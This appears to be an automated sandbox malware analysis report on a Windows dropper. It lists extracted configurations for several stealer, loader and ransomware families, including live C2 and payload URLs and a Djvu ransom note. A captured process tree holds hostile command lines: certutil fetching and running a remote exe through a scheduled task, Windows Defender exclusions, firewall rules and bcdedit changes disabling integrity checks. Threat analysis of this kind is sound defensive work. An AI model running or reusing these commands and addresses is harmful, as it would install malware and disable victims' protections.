Analysis

  • max time kernel
    4294119s
  • max time network
    159s
  • platform
    windows7_x64
  • resource
    win7-20220311-en
  • submitted
    14-03-2022 05:07

General

  • Target

    cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe

  • Size

    7.7MB

  • MD5

    0afafc9f81b758427c2d307bbb79cfdd

  • SHA1

    dfc691cd9375e59ea48d3644cdbedc75a09ef39d

  • SHA256

    cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0

  • SHA512

    60e5591e7c794bff610ebcec2095550dbab70a9ae04b045f9bf23f7cc6f9c5d0dbca5bc13529df752ccc5a8aa7b079fe1227c5e955d223c7ee25a542fd518362

Malware Config

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

redline

Botnet

UDP

C2

45.9.20.20:13441

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

50.7

Botnet

937

C2

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

ruzki12_03

C2

176.122.23.55:11768

Attributes
  • auth_value

    c51ddc8008e8581a01cec6e8291c5530

Extracted

Family

djvu

C2

http://fuyt.org/test3/get.php

Attributes
  • extension

    .xcbg

  • offline_id

    y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1

  • payload_url

    http://zerit.top/dl/build2.exe

    http://fuyt.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Signatures

  • Detected Djvu ransomware 2 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 5 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Modifies boot configuration data using bcdedit 14 IoCs
  • OnlyLogger Payload 2 IoCs
  • Vidar Stealer 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 20 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 57 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 40 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
    "C:\Users\Admin\AppData\Local\Temp\cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1968
    • C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
      "C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:520
    • C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
      "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:768
    • C:\Users\Admin\AppData\Local\Temp\Folder.exe
      "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
      2⤵
      • Executes dropped EXE
      PID:1468
    • C:\Users\Admin\AppData\Local\Temp\Graphics.exe
      "C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1008
      • C:\Users\Admin\AppData\Local\Temp\Graphics.exe
        "C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Windows security modification
        • Adds Run key to start application
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Suspicious use of WriteProcessMemory
        PID:428
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1312
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
            5⤵
            • Modifies data under HKEY_USERS
            PID:872
        • C:\Windows\rss\csrss.exe
          C:\Windows\rss\csrss.exe /202-202
          4⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious use of AdjustPrivilegeToken
          PID:840
          • C:\Windows\system32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            5⤵
            • Creates scheduled task(s)
            PID:1268
          • C:\Windows\system32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
            5⤵
            • Creates scheduled task(s)
            PID:928
          • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
            "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Modifies system certificate store
            PID:836
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
              6⤵
              • Modifies boot configuration data using bcdedit
              PID:2808
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
              6⤵
              • Modifies boot configuration data using bcdedit
              PID:1196
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
              6⤵
              • Modifies boot configuration data using bcdedit
              PID:632
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
              6⤵
              • Modifies boot configuration data using bcdedit
              PID:3000
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
              6⤵
              • Modifies boot configuration data using bcdedit
              PID:2112
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
              6⤵
              • Modifies boot configuration data using bcdedit
              PID:2900
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
              6⤵
              • Modifies boot configuration data using bcdedit
              PID:2304
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
              6⤵
              • Modifies boot configuration data using bcdedit
              PID:2568
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
              6⤵
              • Modifies boot configuration data using bcdedit
              PID:2536
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
              6⤵
              • Modifies boot configuration data using bcdedit
              PID:2648
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
              6⤵
              • Modifies boot configuration data using bcdedit
              PID:2428
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -timeout 0
              6⤵
              • Modifies boot configuration data using bcdedit
              PID:2152
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
              6⤵
              • Modifies boot configuration data using bcdedit
              PID:2532
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\Sysnative\bcdedit.exe /v
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2512
          • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
            5⤵
              PID:1152
            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
              C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
              5⤵
                PID:3036
        • C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
          "C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
          2⤵
          • Executes dropped EXE
          PID:1164
        • C:\Users\Admin\AppData\Local\Temp\Install.exe
          "C:\Users\Admin\AppData\Local\Temp\Install.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:872
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c taskkill /f /im chrome.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1924
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im chrome.exe
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1464
        • C:\Users\Admin\AppData\Local\Temp\Files.exe
          "C:\Users\Admin\AppData\Local\Temp\Files.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:2020
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            3⤵
            • Executes dropped EXE
            PID:1564
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            3⤵
            • Executes dropped EXE
            PID:1528
        • C:\Users\Admin\AppData\Local\Temp\File.exe
          "C:\Users\Admin\AppData\Local\Temp\File.exe"
          2⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Loads dropped DLL
          PID:972
          • C:\Users\Admin\Pictures\Adobe Films\k7D0g8NM08633xtjv4iGBCZw.exe
            "C:\Users\Admin\Pictures\Adobe Films\k7D0g8NM08633xtjv4iGBCZw.exe"
            3⤵
            • Executes dropped EXE
            PID:2072
          • C:\Users\Admin\Pictures\Adobe Films\je4UrxDMZO_PWbRkE5E29E3t.exe
            "C:\Users\Admin\Pictures\Adobe Films\je4UrxDMZO_PWbRkE5E29E3t.exe"
            3⤵
            • Executes dropped EXE
            PID:2192
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
              4⤵
              • Creates scheduled task(s)
              PID:2692
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
              4⤵
              • Creates scheduled task(s)
              PID:2180
            • C:\Users\Admin\Documents\q3Gx3T4A5u44KM5WjEDCgRFc.exe
              "C:\Users\Admin\Documents\q3Gx3T4A5u44KM5WjEDCgRFc.exe"
              4⤵
                PID:2696
            • C:\Users\Admin\Pictures\Adobe Films\PUC2rv9TQnElnu7bjl8s8OWk.exe
              "C:\Users\Admin\Pictures\Adobe Films\PUC2rv9TQnElnu7bjl8s8OWk.exe"
              3⤵
              • Executes dropped EXE
              PID:2216
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /im PUC2rv9TQnElnu7bjl8s8OWk.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\PUC2rv9TQnElnu7bjl8s8OWk.exe" & del C:\ProgramData\*.dll & exit
                4⤵
                  PID:2184
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /im PUC2rv9TQnElnu7bjl8s8OWk.exe /f
                    5⤵
                    • Kills process with taskkill
                    PID:1064
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 6
                    5⤵
                    • Delays execution with timeout.exe
                    PID:1200
              • C:\Users\Admin\Pictures\Adobe Films\iTKXKd2CkhjXXWhcfQ3bSfYo.exe
                "C:\Users\Admin\Pictures\Adobe Films\iTKXKd2CkhjXXWhcfQ3bSfYo.exe"
                3⤵
                • Executes dropped EXE
                PID:2232
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im "iTKXKd2CkhjXXWhcfQ3bSfYo.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\iTKXKd2CkhjXXWhcfQ3bSfYo.exe" & exit
                  4⤵
                    PID:2792
                • C:\Users\Admin\Pictures\Adobe Films\fMMQO1c_SPfeXHPv8JTKtqY4.exe
                  "C:\Users\Admin\Pictures\Adobe Films\fMMQO1c_SPfeXHPv8JTKtqY4.exe"
                  3⤵
                  • Executes dropped EXE
                  PID:2244
                • C:\Users\Admin\Pictures\Adobe Films\2E5ZH7XjOjT1D_2bK2Mz4sCQ.exe
                  "C:\Users\Admin\Pictures\Adobe Films\2E5ZH7XjOjT1D_2bK2Mz4sCQ.exe"
                  3⤵
                  • Executes dropped EXE
                  PID:2264
                • C:\Users\Admin\Pictures\Adobe Films\naZYMpYL2l_9aJ0DIr2tKs4_.exe
                  "C:\Users\Admin\Pictures\Adobe Films\naZYMpYL2l_9aJ0DIr2tKs4_.exe"
                  3⤵
                    PID:2336
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\xeioteuk\
                      4⤵
                        PID:2492
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\rzusqfap.exe" C:\Windows\SysWOW64\xeioteuk\
                        4⤵
                          PID:2240
                        • C:\Windows\SysWOW64\sc.exe
                          "C:\Windows\System32\sc.exe" create xeioteuk binPath= "C:\Windows\SysWOW64\xeioteuk\rzusqfap.exe /d\"C:\Users\Admin\Pictures\Adobe Films\naZYMpYL2l_9aJ0DIr2tKs4_.exe\"" type= own start= auto DisplayName= "wifi support"
                          4⤵
                            PID:2192
                          • C:\Windows\SysWOW64\sc.exe
                            "C:\Windows\System32\sc.exe" description xeioteuk "wifi internet conection"
                            4⤵
                              PID:1356
                            • C:\Windows\SysWOW64\sc.exe
                              "C:\Windows\System32\sc.exe" start xeioteuk
                              4⤵
                                PID:1672
                              • C:\Windows\SysWOW64\netsh.exe
                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                4⤵
                                  PID:2472
                              • C:\Users\Admin\Pictures\Adobe Films\qAz7o2wBr_2nLArICTw_3Q3b.exe
                                "C:\Users\Admin\Pictures\Adobe Films\qAz7o2wBr_2nLArICTw_3Q3b.exe"
                                3⤵
                                  PID:2472
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                    4⤵
                                      PID:2876
                                  • C:\Users\Admin\Pictures\Adobe Films\7CILRlZKoAk7CmN6khlCwZXF.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\7CILRlZKoAk7CmN6khlCwZXF.exe"
                                    3⤵
                                      PID:2560
                                      • C:\Users\Admin\AppData\Local\Temp\7zS3765.tmp\Install.exe
                                        .\Install.exe
                                        4⤵
                                          PID:3040
                                          • C:\Users\Admin\AppData\Local\Temp\7zS513C.tmp\Install.exe
                                            .\Install.exe /S /site_id "525403"
                                            5⤵
                                              PID:2868
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                6⤵
                                                  PID:2200
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                    7⤵
                                                      PID:3044
                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                        8⤵
                                                          PID:3012
                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                          8⤵
                                                            PID:3028
                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                        6⤵
                                                          PID:2440
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                            7⤵
                                                              PID:2760
                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                8⤵
                                                                  PID:2792
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                  8⤵
                                                                    PID:968
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /CREATE /TN "gkGWbyXfh" /SC once /ST 03:38:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                6⤵
                                                                • Creates scheduled task(s)
                                                                PID:2852
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /run /I /tn "gkGWbyXfh"
                                                                6⤵
                                                                  PID:2788
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /DELETE /F /TN "gkGWbyXfh"
                                                                  6⤵
                                                                    PID:2672
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 05:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\NxdfrFl.exe\" j6 /site_id 525403 /S" /V1 /F
                                                                    6⤵
                                                                    • Creates scheduled task(s)
                                                                    PID:2952
                                                            • C:\Users\Admin\Pictures\Adobe Films\mDKIC_JaLGdwjCFdL3i8ITIn.exe
                                                              "C:\Users\Admin\Pictures\Adobe Films\mDKIC_JaLGdwjCFdL3i8ITIn.exe"
                                                              3⤵
                                                                PID:2520
                                                              • C:\Users\Admin\Pictures\Adobe Films\yShp_yeyPx0JL4_TASAhHf_U.exe
                                                                "C:\Users\Admin\Pictures\Adobe Films\yShp_yeyPx0JL4_TASAhHf_U.exe"
                                                                3⤵
                                                                  PID:2464
                                                                • C:\Users\Admin\Pictures\Adobe Films\F1tQ9fZeBOsjf1HbTroOxz21.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\F1tQ9fZeBOsjf1HbTroOxz21.exe"
                                                                  3⤵
                                                                    PID:2456
                                                                  • C:\Users\Admin\Pictures\Adobe Films\pYB1MuTIRSyTnJ3ToM9tHDpY.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\pYB1MuTIRSyTnJ3ToM9tHDpY.exe"
                                                                    3⤵
                                                                      PID:2420
                                                                    • C:\Users\Admin\Pictures\Adobe Films\Phi7YJEGhpKnkmz2scMkiP1F.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\Phi7YJEGhpKnkmz2scMkiP1F.exe"
                                                                      3⤵
                                                                        PID:2412
                                                                      • C:\Users\Admin\Pictures\Adobe Films\6ac7yeCSinoAQH2LnzSazko4.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\6ac7yeCSinoAQH2LnzSazko4.exe"
                                                                        3⤵
                                                                          PID:2380
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2380 -s 420
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:2508
                                                                        • C:\Users\Admin\Pictures\Adobe Films\hstJIb2kvtuMog1Bt9hR61Mi.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\hstJIb2kvtuMog1Bt9hR61Mi.exe"
                                                                          3⤵
                                                                            PID:2372
                                                                            • C:\Users\Admin\AppData\Local\Temp\c02af023-effe-4ef1-bb57-42cf1977090a.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\c02af023-effe-4ef1-bb57-42cf1977090a.exe"
                                                                              4⤵
                                                                                PID:2536
                                                                            • C:\Users\Admin\Pictures\Adobe Films\8xP7p9G9WU4CbDRf2C4BGqIo.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\8xP7p9G9WU4CbDRf2C4BGqIo.exe"
                                                                              3⤵
                                                                                PID:2364
                                                                              • C:\Users\Admin\Pictures\Adobe Films\qKlQzA06rwnd_YZXoLE6OPAX.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\qKlQzA06rwnd_YZXoLE6OPAX.exe"
                                                                                3⤵
                                                                                  PID:2356
                                                                              • C:\Users\Admin\AppData\Local\Temp\pub2.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Checks SCSI registry key(s)
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                PID:1568
                                                                            • C:\Windows\system32\makecab.exe
                                                                              "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220314050742.log C:\Windows\Logs\CBS\CbsPersist_20220314050742.cab
                                                                              1⤵
                                                                              • Drops file in Windows directory
                                                                              PID:928
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                                                              1⤵
                                                                                PID:2608
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd
                                                                                  2⤵
                                                                                    PID:2676
                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                      findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
                                                                                      3⤵
                                                                                        PID:2496
                                                                                      • C:\Windows\SysWOW64\waitfor.exe
                                                                                        waitfor /t 5 jFjyKdbHiNcpqGHLaDXhhIXfDT
                                                                                        3⤵
                                                                                          PID:2764
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                                                                          Accostarmi.exe.pif N
                                                                                          3⤵
                                                                                            PID:2164
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /im "iTKXKd2CkhjXXWhcfQ3bSfYo.exe" /f
                                                                                        1⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:2940
                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                        1⤵
                                                                                          PID:2908
                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                          1⤵
                                                                                            PID:2920
                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                            1⤵
                                                                                              PID:2928
                                                                                            • C:\Windows\SysWOW64\find.exe
                                                                                              find /I /N "psuaservice.exe"
                                                                                              1⤵
                                                                                                PID:2260
                                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                                tasklist /FI "imagename eq PSUAService.exe"
                                                                                                1⤵
                                                                                                • Enumerates processes with tasklist
                                                                                                PID:2256
                                                                                              • C:\Users\Admin\Pictures\Adobe Films\qKlQzA06rwnd_YZXoLE6OPAX.exe
                                                                                                "C:\Users\Admin\Pictures\Adobe Films\qKlQzA06rwnd_YZXoLE6OPAX.exe"
                                                                                                1⤵
                                                                                                  PID:2444
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 192
                                                                                                    2⤵
                                                                                                    • Program crash
                                                                                                    PID:2120
                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
